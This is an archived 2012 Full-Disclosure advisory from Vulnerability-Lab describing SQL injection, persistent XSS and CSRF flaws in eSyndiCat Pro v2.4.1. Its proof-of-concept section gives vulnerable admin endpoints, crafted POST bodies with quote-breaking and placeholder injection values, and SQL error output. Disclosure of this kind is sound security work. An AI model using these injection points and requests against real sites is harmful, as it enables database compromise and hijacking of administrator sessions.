[<prev] [next>] [day] [month] [year] [list]
Message-ID: <4FD94AAE.1090607@vulnerability-lab.com>
Date: Thu, 14 Jun 2012 04:21:34 +0200
From: Research <research@...nerability-lab.com>
To: full-disclosure@...ts.grok.org.uk
Subject: eSyndiCat Pro v2.4.1 - Multiple Web
Vulnerabilities
Title:
======
eSyndiCat Pro v2.4.1 - Multiple Web Vulnerabilities
Date:
=====
2012-05-19
References:
===========
http://www.vulnerability-lab.com/get_content.php?id=575
VL-ID:
=====
575
Common Vulnerability Scoring System:
====================================
7.1
Introduction:
=============
eSyndiCat is a full featured php directory software that can be used as an addition to your existing site
or as a stand-alone platform. Using eSyndiCat Directory Software your website can achieve top rank and take
the leading positions in the most popular search engines! Powering 45,000+ Successful Directories Since 2005
It is no wonder why eSyndiCat is one of the most popular php directory scripts since 2005. eSyndiCat is more
than just a directory software. It can be easily used as a business directory script, article directory software,
bidding directory script, church directory software and more.
(Copy of the Vendor Homepage: http://www.esyndicat.com )
Abstract:
=========
The Vulnerability Laboratory Research Team discovered multiple Web Vulnerabilities in eSyndiCat Pro v2.4.1 Service & Management System.
Report-Timeline:
================
2012-05-19: Public or Non-Public Disclosure
Status:
========
Published
Exploitation-Technique:
=======================
Remote
Severity:
=========
High
Details:
========
1.1
Multiple SQL Injection vulnerabilities are detected in the eSyndiCat Pro v2.4.1 Service Application & Management System.
The vulnerability allows an attacker (remote) to inject/execute own sql commands on the affected application dbms.
The vulnerabilities are located in multiple application files when processing to request (POST) via cvs importer the
Delimiter or when processing to add rss feeds with manipulated Number of items. Successful exploitation of the vulnerability
results in dbms, service & application compromise.
Vulnerable Module(s):
[+] CVS Import - Delimiter
[+] RSS ADD - Number of items
Vulnerable Parameter(s):
[+] num & delimiter num
1.2
Multiple persistent input validation vulnerabilities are detected in the eSyndiCat Pro v2.4.1 Service Application CMS.
The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent).
The persistent vulnerabilities are located in the input fields of the account username, new listing descriptionname &
controller suggest name. The persistent script code (HTML/JS) get executed out of the listing or username profile webpage
context. Successful exploitation of the vulnerability can lead to session hijacking (manager/admin) or stable (persistent)
context manipulation. Exploitation requires low user inter action & low privileged user account.
Vulnerable Module(s):
[+] Accounts > Username
[+] New Listings > Description of the Listing
[+] Controller > Suggest Listing & Inputs
1.3
A cross site request forgery vulnerability is detected in eSyndiCat Pro v2.4.1 Service Application & Management System.
The bugs allow remote attackers with high required user inter action to edit user accounts. Successful exploitation can
lead to account creation. To exploit the issue the attacker need to create a manipulated copy the edit user mask/form.
Inside of the document the remote can implement his own values for the update because of no form or token protection.
When admin get now forced to execute the script via link he is executing the new value on the update of the application
if his session is not expired.
Vulnerable Module(s):
[+] Add Administrator Accounts - Form
Proof of Concept:
=================
1.1
The sql injection vulnerabilities can be exploited by remote attackers with privileged user account & without user inter action.
For demonstration or reproduce ...
PoC:
http://127.0.0.1:8080/admin/controller.php?plugin=import_csv > Delimiter [POST]
POSTDATA =-----------------------------
-----------------------------133572933723271
Content-Disposition: form-data; name="delimeter"
-1'
-----------------------------133572933723271
Content-Disposition: form-data; name="parse"
Parse
-----------------------------133572933723271--
-----------------------------130222961710112
Content-Disposition: form-data; name="csvfile"; filename="1.csv"
Content-Type: application/x-download
hackhack-test
-----------------------------130222961710112
Content-Disposition: form-data; name="delimeter"
-1' VL
-----------------------------130222961710112
Content-Disposition: form-data; name="parse"
Parse
-----------------------------130222961710112--
-----------------------------238692936112896
Content-Disposition: form-data; name="delimeter"
-1'
-----------------------------238692936112896
Content-Disposition: form-data; name="parse"
Parse
-----------------------------238692936112896--
&&
POSTDATA=
57185fdd52
&title=research&url=http://test.com
&num=[SQL Injection]
&status=active&goto=
list&categories=&save=Add
http://127.0.0.1:8080/admin/controller.php?plugin=rss&do=add > Number of items
--- SQL Exception Logs ---
WARNING: mysql_list_fields() [function.mysql-list-fields]: Unable to save MySQL query
result [ 16 May 2012 23:41:11 ] in cms/plugins/import_csv/admin/index.php:69
WARNING: mysql_num_fields(): supplied argument is not a valid MySQL result resource
[ 16 May 2012 23:41:11 ] in cms/plugins/import_csv/admin/index.php:70
... or
Database query error:
Error: Unknown column id_block in field list
UPDATE `v23s_blocks` SET `id_block` = 0 WHERE `id` = 6
1.2
The persistent input validation vulnerabilities can be exploited by remote attackers with low required user inter action.
For demonstration or reproduce ...
Review: User Account - Listing (After persistent script code inject)
<td class="x-grid3-col x-grid3-cell x-grid3-td-2 " style="width: 379px;" tabindex="0">
<div id="ext-gen94" class="x-grid3-cell-inner x-grid3-col-2" unselectable="on">
"><[PERSISTENT SCRIPT CODE]("</div'></td><
URL: http://127.0.0.1:8080/bambam/admin/controller.php?file=accounts - username & email
Reference(s):
http://127.0.0.1:8080/articles/admin/controller.php?file=accounts&id=2 (USERNAME+[PERSISTENT SCRIPT CODE])
http://127.0.0.1:8080/articles/new-listings.html (Description+[PERSISTENT SCRIPT CODE])
http://127.0.0.1:8080/articles/admin/controller.php?file=suggest-listing&id=0 (SUGGEST TITLE+[PERSISTENT SCRIPT CODE])
1.3
The cross site request forgery vulnerability can be exploited by remote attackers with high required user inter action.
For demonstration or reproduce ...
URL: http://127.0.0.1:8080/articles/admin/controller.php?file=admins&do=add
> ID=1 <= Admin ;)
> ID=2
> ID=3
> ID=4
> ID=5
- NAME > PASS > ID := 1
Risk:
=====
1.1
The security risk of the sql injection vulnerabilities are estimated as high(-).
1.2
The security risk of the persistent input validation vulnerabilities are estimated as medium(+).
1.3
The security risk of the cross site request forgery vulnerability is estimated as low(+).
Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri [Rem0ve] (bkm@...nerability-lab.com)
Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply.
Domains: www.vulnerability-lab.com - www.vuln-lab.com
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
Contact: admin@...nerability-lab.com - support@...nerability-lab.com - irc.vulnerability-lab.com
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of
other media, are reserved by Vulnerability-Lab Research Team or its suppliers.
Copyright © 2012 Vulnerability-Lab
--
VULNERABILITY RESEARCH LABORATORY TEAM
Website: www.vulnerability-lab.com
Mail: research@...nerability-lab.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists